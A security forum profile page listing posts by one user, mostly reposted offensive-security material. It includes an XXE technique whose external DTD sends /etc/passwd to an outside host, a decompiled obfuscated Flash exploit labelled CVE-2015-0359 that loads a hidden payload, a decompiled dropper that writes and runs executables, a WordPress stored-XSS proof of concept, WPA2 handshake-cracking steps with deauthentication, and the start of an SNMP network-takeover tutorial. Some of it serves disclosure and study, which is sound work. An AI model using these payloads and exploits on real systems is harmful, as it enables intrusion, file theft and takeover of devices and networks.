Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18772

  • Joined

  • Last visited

  • Days Won

    730

 Content Type 

Everything posted by Nytro

  1. Nytro
    Si bozgorii?
  2. Nytro
    The "cum il folosesc?" questions are coming.
  3. Nytro
    Daca afiseaza numele fisierului (care contine entitatea respectiva, adica continutul /etc/passwd) atunci ar trebui sa fie afisat complet. Da, depinde si de asta, dar e o idee care poate fi utila.
  4. Nytro
    Forcing XXE Reflection through Server Error Messages Antti Rantasaari | May 4, 2015 XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web requests. For easy use of XXE, the server response must include a reflection point that displays the injected entity (remote file) back to the client. Below is an example of a common XXE injection request and response. The injections have been bolded in red. HTTP Request: POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/xml Content-Length: 288 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <search>name</search> <value>&netspi;</value> </root> HTTP Response: HTTP/1.1 200 OK Content-Type: application/xml Content-Length: 2467 <?xml version="1.0" encoding="UTF-8"?> <errors> <error>no results for name root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync.... </error> </errors> However, it’s also very common for nothing to be returned in the error response if the application doesn’t reflect any user input back to the client. This can make simple XXE attacks harder. If connections are allowed to remote systems from the vulnerable server then it’s possible to use an external DTD to extract local files via web requests. This technique has been covered in greater detail at this whitepaper but below is an overview of how the modified XXE injection technique works and can be executed. Host a .dtd file on a web server that is accessible from the vulnerable system. In my example the “netspi.dtd” file is hosted on xxe.netspi.com. The DTD file contains a XXE injection that will send the contents of the /etc/password file to the web server at Not Found. <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % param1 '<!ENTITY % external SYSTEM "http://xxe.netspi.com/x=%payload;">'> %param1; %external; Next, the attack can be executed by referencing the hosted DTD file as shown below. The request does not even have to contain any XML body, for as long as the server processes XML requests. HTTP Request: POST /netspi HTTP/1.1 Host: someserver.netspi.com Accept: application/json Content-Type: application/xml Content-Length: 139 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE foo SYSTEM "http://xxe.netspi.com/netspi.dtd"> <root> <search>name</search> </root> At this point the XXE attack results in a connection to xxe.netspi.com to load the external DTD file. The hosted DTD file then uses parameter entities to wrap the contents of the /etc/passwd file into another HTTP request to xxe.netspi.com. Now it may be possible to extract the contents of /etc/passwd file without having a reflection point on the page itself, but by reading incoming traffic on xxe.netspi.com. The file contents can be parsed from web server logs or from an actual page. I should note that only a single line of /etc/passwd can be read using this method, or the HTTP request may fail altogether because of line breaks in the target file. There is another option though. In some cases it’s also possible to make data extraction easier by forcing an error on the server by adding an invalid URI to the request. Below is an example of a modified DTD: <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external; If the server displays verbose errors to client, the error may contain the file contents of the file that’s getting extracted. Below is an example: HTTP Response: HTTP/1.1 500 Internal Server Error Content-Type: application/xml Content-Length: 2467 <?xml version="1.0" encoding="UTF-8"?><root> <errors> <errorMessage>java.io.FileNotFoundException: file:///nothere/root:x:0:0:root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync.... The invalid file path causes a “FileNotFoundException”, and an error message that contains /etc/passwd file contents. This same technique was recently covered in this Drupal XXE whitepaper as well but as I had the blog written I thought I could as well publish it References https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf Sursa: https://blog.netspi.com/forcing-xxe-reflection-server-error-messages/
  5. Nytro
    Flash_Exploit.SWF CVE-2015-0359 PoC BY: _D3F4ULT package { public class $1$6$7$@120984$cQhWvZ56 { } $1$6$7$@120984$cQhWvZ56 = [OP_NEWCLASS ClassInfo:0 base:Object]; 34643$OfA2FuRBJ#@ = [OP_NEWCLASS ClassInfo:1 base:MovieClip]; 3m3qT@@9jm4 = [OP_NEWCLASS ClassInfo:2 base:Object]; 6KovfYYrEFkW = [OP_NEWCLASS ClassInfo:3 base:ByteArray]; }//package import flash.display.*; import flash.system.*; import flash.utils.*; package { public class 34643$OfA2FuRBJ#@ extends MovieClip { private var 13AFv7jyfFP; private var YWH9DbQhT:Class; private var 65%$uHPix2Gq4k%ss = "ToStage"; private var _StrPool46:uint = 0; private var %%Awjftgdfe^&:uint = 0; private var X4O3S0e:uint = 0xFF; private var 3eMXkL2fIA; private var 86OI8FG3RS4; public function 34643$OfA2FuRBJ#@(_arg1:Object=null){ Security[((("al" + "low") + "Dom") + "ain")]("*"); var _local2:* = ApplicationDomain[(("current" + "Do") + "main")]; this.65%$uHPix2Gq4k%ss = (("ad" + "ded") + this.65%$uHPix2Gq4k%ss); var _local4 = (_local2[("getD" + "efinition")]("flash.display.Loader") as Class); this.13AFv7jyfFP = new (_local4)(); this.YWH9DbQhT = (_local2[("getD" + "efinition")]("flash.utils.ByteArray") as Class); if (this["stage"]){ this.4kjf1flZV1ZTA7(); } else { this["addEventListener"](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7); }; } public function EmptyHandler(_arg1:Object, _arg2:int):void{ _arg2++; } private function 4kjf1flZV1ZTA7(_arg1:Object=null):void{ this[(("rem" + "oveEven") + "tListener")](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7); this["addEventListener"]("enterFrame", this.TVN3N5UQ); var _local2:* = new 6KovfYYrEFkW(); var _local3:* = new this.YWH9DbQhT(); this.$$!!323tr(); this.ym9LDy3rDi8Fz(_local2, _local2["length"], _local3); this.gzZrsob66e0cB6oT(_local3); var _local4:uint = 91; var _local5 = 0; if ((_local5 < _local3["length"])){ var _local6:uint = (_local3[_local5] ^ _local4); _local4 = _local3[_local5]; _local3[_local5] = _local6; _local5++; //unresolved jump }; var _local8 = "com"; _local3[((("un" + _local8) + "pres") + "s")](); this.13AFv7jyfFP[("load" + "Bytes")](_local3); this[("add" + "Child")](this.13AFv7jyfFP); //unresolved jump !ERROR! return; } private function TVN3N5UQ(_arg1):void{ if ((this.currentFrame == 200)){ this.gotoAndPlay(new Number(2)); return; }; } private function $$!!323tr():void{ this.3eMXkL2fIA = new this.YWH9DbQhT(); this.86OI8FG3RS4 = new this.YWH9DbQhT(); var _local2:int; _local2 = 65; if ((_local2 < 91)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 97; if ((_local2 < 123)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 48; if ((_local2 < 58)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 33; if ((_local2 < 48)){ if ((((((_local2 == 34)) || ((_local2 == 39)))) || ((_local2 == 45)))){ } else { this.86OI8FG3RS4["writeByte"](_local2); }; _local2++; //unresolved jump }; _local2 = 58; if ((_local2 < 65)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; _local2 = 91; if ((_local2 < 97)){ if ((_local2 == 92)){ } else { this.86OI8FG3RS4["writeByte"](_local2); }; _local2++; //unresolved jump }; _local2 = 123; if ((_local2 < 127)){ this.86OI8FG3RS4["writeByte"](_local2); _local2++; //unresolved jump }; this.86OI8FG3RS4["writeByte"](34); var _local3:int; _local3 = 0; if ((_local3 < 0xFF)){ this.3eMXkL2fIA[_local3] = 0xFF; _local3++; //unresolved jump }; _local3 = 0; if ((_local3 < this.86OI8FG3RS4["length"])){ this.3eMXkL2fIA[this.86OI8FG3RS4[_local3]] = _local3; _local3++; //unresolved jump }; } public function gzZrsob66e0cB6oT(_arg1):uint{ var _local2:uint = 0; if (!((this.X4O3S0e == 0xFF))){ _arg1[_arg1["length"]] = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&)); _local2 = (_local2 + 1); }; return (_local2); } public function ym9LDy3rDi8Fz(_arg1, _arg2:uint, _arg3):uint{ var _local4 = 0; var _local5:uint = 0; _local4 = 0; if ((_local4 < _arg2)){ if ((this.3eMXkL2fIA[_arg1[_local4]] == 0xFF)){ } else { if ((this.X4O3S0e == 0xFF)){ this.X4O3S0e = this.3eMXkL2fIA[_arg1[_local4]]; } else { this.X4O3S0e = (this.X4O3S0e + (this.3eMXkL2fIA[_arg1[_local4]] * this.86OI8FG3RS4["length"])); this._StrPool46 = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&)); this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& + ((((this.X4O3S0e & 8191) > 88)) ? 13 : 14)); var _local7 = _local5; _local5 = (_local7 + 1); _arg3[_local7] = (this._StrPool46 & 0xFF); this._StrPool46 = (this._StrPool46 >> 8); this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& - 8); //unresolved if this.X4O3S0e = 0xFF; }; }; _local4++; //unresolved jump }; return (_local5); } } }//package package { public class 3m3qT@@9jm4 { } }//package package { public class 6KovfYYrEFkW extends ByteArray { public function 9IRh0mi4XOG():void{ } public function A3Ig1if():int{ return (0); } } }//package "twitter.com/_d3f4ult"Via: http://pastebin.com/5nnP7X0x
  6. Nytro
    Writing a Metasploit post exploitation module April 6, 2015 Ionut Popescu The exploitation of a machine is only a step in a penetration test. What you do next? How can you pivot from the exploited machine to other machines in the network? This is the step where you need to prove you post exploitation skills. Even if Metasploit is a complex framework, it is not complete and you can extend it. Why would I write one? Metasploit is the “World’s most used penetration testing software”, it contains a huge collection of modules, but it is not complete and you can customize it by writing your own modules.Even if you manage to compromise a machine, you may ask yourself: “Now what?”. You can use one of the many Metasploit post exploitation modules, but what if you don’t find a suitable module for you? You may request it to the Metasploit community and developers but it may take a lot of time until it will be available. So why don’t you try to write your own module? Articol complet: Writing a Metasploit post exploitation module – Security Café
  7. Nytro
    E relativ. Opcode-ul "eb 17" == "sari 0x17 bytes" 8048062 (adresa urmatoare) + 0x17 == 8048079 E ciudat ca e "jmp 8048079" si nu "jmp 08048078" pentru ca la "08048078" se afla acel call care pune pe stack "/bin/sh". A, pula. Daca te uiti in shellcode-ul din programul C: \xeb\x16\x5e\x31 Este "eb 16" adica "jmp 08048078".
  8. Nytro
    Probabil iti plac femeile din Coreea sau Japonia, nu China.
  9. Nytro
    Malware. Copiaza un rahat (prost bindat, non-encrypted) in AppData. Dracia e scrisa in .NET si se vede usor: [COLOR=#1000a0]public[/COLOR] [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Object"]object[/URL] [B][URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Xtraer():Object"]Xtraer[/URL][/B]() { [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Object"]object[/URL] [B]obj2[/B]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL] [B]num2[/B]; [COLOR=#1000a0]try[/COLOR] { [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL] [B]num3[/B]; [B]Label_0001[/B]: [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.CompilerServices.ProjectData"]ProjectData[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.CompilerServices.ProjectData/ClearProjectError()"]ClearProjectError[/URL](); [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL] [B]num[/B] = [COLOR=#800000]-2[/COLOR]; [B]Label_0009[/B]: num3 = [COLOR=#800000]2[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileOpen(Int32,String,Microsoft.VisualBasic.OpenMode,Microsoft.VisualBasic.OpenAccess,Microsoft.VisualBasic.OpenShare,Int32)"]FileOpen[/URL]([COLOR=#800000]1[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta1:String"]Ruta1[/URL] + [COLOR=#800000]@"\ndwkdwmm.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode"]OpenMode[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode/Binary"]Binary[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess"]OpenAccess[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess/ReadWrite"]ReadWrite[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare"]OpenShare[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare/Shared"]Shared[/URL], [COLOR=#800000]-1[/COLOR]); [B]Label_0028[/B]: num3 = [COLOR=#800000]3[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FilePut(Int32,String,Int64,Boolean)"]FilePut[/URL]([COLOR=#800000]1[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Dat:String%5b%5d"]Dat[/URL][[COLOR=#800000]1[/COLOR]], [COLOR=#800000]-1[/COLOR][COLOR=#800000]L[/COLOR], [COLOR=#800000]false[/COLOR]); [B]Label_003D[/B]: num3 = [COLOR=#800000]4[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileClose(Int32%5b%5d)"]FileClose[/URL]([COLOR=#1000a0]new[/COLOR] [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL][] { [COLOR=#800000]1[/COLOR] }); [B]Label_0052[/B]: num3 = [COLOR=#800000]5[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction"]Interaction[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction/Shell(String,Microsoft.VisualBasic.AppWinStyle,Boolean,Int32):Int32"]Shell[/URL]([COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta1:String"]Ruta1[/URL] + [COLOR=#800000]@"\ndwkdwmm.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle"]AppWinStyle[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle/NormalFocus"]NormalFocus[/URL], [COLOR=#800000]false[/COLOR], [COLOR=#800000]-1[/COLOR]); [B]Label_006E[/B]: num3 = [COLOR=#800000]6[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileOpen(Int32,String,Microsoft.VisualBasic.OpenMode,Microsoft.VisualBasic.OpenAccess,Microsoft.VisualBasic.OpenShare,Int32)"]FileOpen[/URL]([COLOR=#800000]2[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta2:String"]Ruta2[/URL] + [COLOR=#800000]@"\lklslslowlsloloaolsl.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode"]OpenMode[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode/Binary"]Binary[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess"]OpenAccess[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess/ReadWrite"]ReadWrite[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare"]OpenShare[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare/Shared"]Shared[/URL], [COLOR=#800000]-1[/COLOR]); [B]Label_008D[/B]: num3 = [COLOR=#800000]7[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FilePut(Int32,String,Int64,Boolean)"]FilePut[/URL]([COLOR=#800000]2[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Dat:String%5b%5d"]Dat[/URL][[COLOR=#800000]2[/COLOR]], [COLOR=#800000]-1[/COLOR][COLOR=#800000]L[/COLOR], [COLOR=#800000]false[/COLOR]); [B]Label_00A2[/B]: num3 = [COLOR=#800000]8[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileClose(Int32%5b%5d)"]FileClose[/URL]([COLOR=#1000a0]new[/COLOR] [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL][] { [COLOR=#800000]2[/COLOR] }); [B]Label_00B7[/B]: num3 = [COLOR=#800000]9[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction"]Interaction[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction/Shell(String,Microsoft.VisualBasic.AppWinStyle,Boolean,Int32):Int32"]Shell[/URL]([COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta2:String"]Ruta2[/URL] + [COLOR=#800000]@"\lklslslowlsloloaolsl.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle"]AppWinStyle[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle/NormalFocus"]NormalFocus[/URL], [COLOR=#800000]false[/COLOR], [COLOR=#800000]-1[/COLOR]); Scan real: https://www.virustotal.com/ro/file/8c6ac3cac91fe069cf49888f81eecc11733b788cc8bb0eb4b40e96dc2460f108/analysis/1430732314/
  10. Nytro
    Dezactivati "Facebook platform" din setarile de la Facebook.
  11. Nytro
    WordPress 4.2 stored XSS From: Jouko Pynnonen <jouko () iki fi>Date: Mon, 27 Apr 2015 05:15:46 +0300 OVERVIEW ========== Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed. If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors. Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system. DETAILS ======== If the comment text is long enough, it will be truncated when inserted in the database. The MySQL TEXT type size limit is 64 kilobytes so the comment has to be quite long. The truncation results in malformed HTML generated on the page. The attacker can supply any attributes in the allowed HTML tags, in the same way as with the two other recently published stored XSS vulnerabilities affecting the WordPress core. The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 2014 (patched this week, after 14 months). Instead of using an invalid UTF-8 character to truncate the comment, this time an excessively long comment text is used for the same effect. In these two cases the injected JavaScript apparently can't be triggered in the administrative Dashboard, so these exploits require getting around comment moderation e.g. by posting one harmless comment first. PROOF OF CONCEPT ================== Enter the following as a comment: <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA [64 kb] ...'></a> This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53 and 5.5.41. SOLUTION ========= Disable comments (Dashboard, Settings/Discussion, select as restrictive options as possible). Do not approve any comments. CREDITS ======== The vulnerability was discovered by Jouko Pynnönen of Klikki Oy. An up-to-date version of this document: http://klikki.fi/adv/wordpress2.html -- Jouko Pynnönen <jouko () iki fi> Klikki Oy - http://klikki.fi - @klikkioy Sursa: Bugtraq: WordPress 4.2 stored XSS
  12. Nytro
    Forta
  13. Nytro
    Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client withen range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake. Install $ sudo python setup.py install Sample use $ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1" -r Where to read input pcap file with half handshake (works with full handshakes too) -m AP mac address (From the 'fake' access point that was used during the capture) -s AP SSID -d (optional) Where to read dictionary from Capturing half handshakes To listen for device probes the aircrack suite can be used as follows sudo airmon-ng start wlan0 sudo airodump-ng mon0 You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything In ubuntu this can be done here 3 Ways to Create Wifi Hotspot in Ubuntu 14.04 (Android Support) | UbuntuHandbook Capture traffic on this interface. In linux this can be achived with TCPdump sudo tcpdump -i wlan0 -s 65535 -w file.cap (optional) Deauthenticate clients from nearby WiFi networks to increase probes If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks deauthentication [Aircrack-ng] Sursa: https://github.com/dxa4481/WPA2-HalfHandshake-Crack
  14. Nytro
    Contents 1. NtGlobalFlag ...................................................................................................................... 5 2. Heap flags ........................................................................................................................... 8 3. The Heap ............................................................................................................................. 15 4. Thread Local Storage ................................................................................................... 19 5. Anti-Step-Over ................................................................................................................ 25 6. Hardware ............................................................................................................................. 29 A. Hardware breakpoints ............................................................................................... 29 B. Instruction Counting ............................................................................................... 30 C. Interrupt 3 ................................................................................................................... 34 D. Interrupt 0x2d ............................................................................................................ 35 E. Interrupt 0x41 ............................................................................................................ 36 F. MOV SS .............................................................................................................................. 37 7. APIs ...................................................................................................................................... 38 A. Heap functions ............................................................................................................ 38 B. Handles ............................................................................................................................ 41 i. OpenProcess ............................................................................................................... 41 ii. CloseHandle ............................................................................................................. 44 iii. CreateFile ............................................................................................................. 48 iv. LoadLibrary ............................................................................................................. 53 v. ReadFile ...................................................................................................................... 55 C. Execution Timing ........................................................................................................ 57 D. Process-level............................................................................................................... 62 i. CheckRemoteDebuggerPresent .............................................................................. 62 ii. Parent Process ...................................................................................................... 63 iii. CreateToolhelp32Snapshot .............................................................................. 65 iv. DbgBreakPoint......................................................................................................... 79 v. DbgPrint ...................................................................................................................... 80 vi. DbgSetDebugFilterState ..................................................................................... 82 vii. IsDebuggerPresent.............................................................................................. 83 viii. NtQueryInformationProcess .......................................................................... 84 ix. OutputDebugString ................................................................................................ 88 x. RtlQueryProcessHeapInformation ..................................................................... 90 xi. NtQueryVirtualMemory ......................................................................................... 91 xii. RtlQueryProcessDebugInformation ............................................................... 92 xiii. SwitchToThread .................................................................................................. 94 xiv. Toolhelp32ReadProcessMemory........................................................................ 95 xv. UnhandledExceptionFilter ................................................................................ 97 xvi. VirtualProtect .................................................................................................... 98 E. System-level ............................................................................................................... 100 i. FindWindow ............................................................................................................... 100 ii. NtQueryObject....................................................................................................... 102 iii. NtQuerySystemInformation ............................................................................ 105 iv. Selectors ............................................................................................................... 115 F. User-interface .......................................................................................................... 118 i. BlockInput ............................................................................................................... 118 ii. FLD............................................................................................................................. 120 iii. NtSetInformationThread................................................................................. 121 iv. SuspendThread....................................................................................................... 122 v. SwitchDesktop ......................................................................................................... 123 G. Uncontrolled execution ......................................................................................... 124 i. CreateProcess ......................................................................................................... 125 ii. CreateThread ......................................................................................................... 130 iii. DebugActiveProcess ......................................................................................... 131 iv. Enum... .................................................................................................................... 134 v. GenerateConsoleCtrlEvent................................................................................. 134 vi. NtSetInformationProcess................................................................................. 136 vii. NtSetLdtEntries ................................................................................................ 137 viii. QueueUserAPC .................................................................................................... 138 ix. RaiseException .................................................................................................... 139 x. RtlProcessFlsData ................................................................................................ 141 xi. WriteProcessMemory............................................................................................ 142 xii. Intentional exceptions................................................................................. 143 H. Conclusion ................................................................................................................... 146 Download: http://pferrie.host22.com/papers/antidebug.pdf
  15. Nytro
    Hacking networks with SNMP Posted on April 21, 2015 by Torstein Summary Exploiting common misconfigurations in network systems allows an attacker to gather and use information to take over and control network devices. This can be done just as easily to core equipment as to Customer-Premises Equipment(CPE). A large scale attack will make it possible to hijack an entire Internet Service Provider(ISP) within a very short time. This demonstration will be done against a virtualized Cisco network, but the same techniques applies to other vendors like Juniper, HP, Linux and others. Virtualization To prevent doing any damage to real networks, I will use GNS3 with Cisco to emulate a basic WAN. As for the attacking computer, a virtual Kali Linux will be attached to the network. Attacker IP: 80.200.43.20 Cisco configuration example for SNMP and NTP: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD=class: crayon-code]interface GigabitEthernet0/0 ip address 88.0.3.10 255.255.255.0 ! ip access-list standard management remark ### NTP ### permit 80.2.0.64 remark ### SNMP ### permit 80.2.0.33 ! snmp-server community _________ RW management ! line vty 0 4 access-class management in ! ntp server 80.2.0.64 [/TD] [/TR] [/TABLE] Discovering devices The initial scan plays an important role in discovering remote vulnerable devices. SNMP is configured with a access-lists will still indicate a open port by connecting to it. The access-list will of-course deny any type of requests you make to the device unless the 